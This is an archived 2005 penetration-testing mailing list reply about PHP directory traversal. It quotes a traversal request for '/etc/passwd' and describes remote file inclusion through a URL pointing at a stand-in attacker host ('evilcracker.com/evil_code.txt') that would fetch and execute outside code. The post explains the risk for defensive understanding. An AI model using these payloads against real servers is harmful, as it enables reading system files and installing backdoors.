Penetration Testing mailing list archives
Re: PHP Directory Transversal
From: John GALLET <john.gallet () wanadoo fr>
Date: Mon, 14 Mar 2005 09:06:25 +0100 (CET)
Hi there,
Therefore, I tried doing a www.example.com/static.php?page=../../../../../../etc/passwd but I get an error saying that file doesn't exist. I user the same source code in my server, and I could retrieve the file...what can be happening? I don't think it is under a chroot jail...
What you can or can not read depends on the configuration of php (include_path vs safe mode for example). Have a look at : http://fr3.php.net/features.safe-mode Now the real risk is not so much reading some source code as executing some other people's code. www.example.com/static.php?page=http://evilcracker.com/evil_code.txt has good chances of also getting executed, which opens the path to install any backdoor, download perl scripts/trojans, etc... HTH JG
Current thread:
- Re: PHP Directory Transversal, (continued)
- Re: PHP Directory Transversal Andres Molinetti (Mar 10)
- Re: PHP Directory Transversal David M. Zendzian (Mar 10)
- Re: PHP Directory Transversal Cedric Foll (Mar 10)
- RE: PHP Directory Transversal Ravish (Mar 10)
- Terminal Services AEHeald (Mar 11)
- Re: Terminal Services Kinnell (Mar 11)
- RE: Terminal Services Jerry Shenk (Mar 11)
- Re: Terminal Services John the Kiwi (Mar 11)
- RE: Terminal Services Ola (Mar 14)
- RE: Terminal Services Mark Woan (Mar 16)
- Terminal Services AEHeald (Mar 11)
- Re: PHP Directory Transversal John GALLET (Mar 14)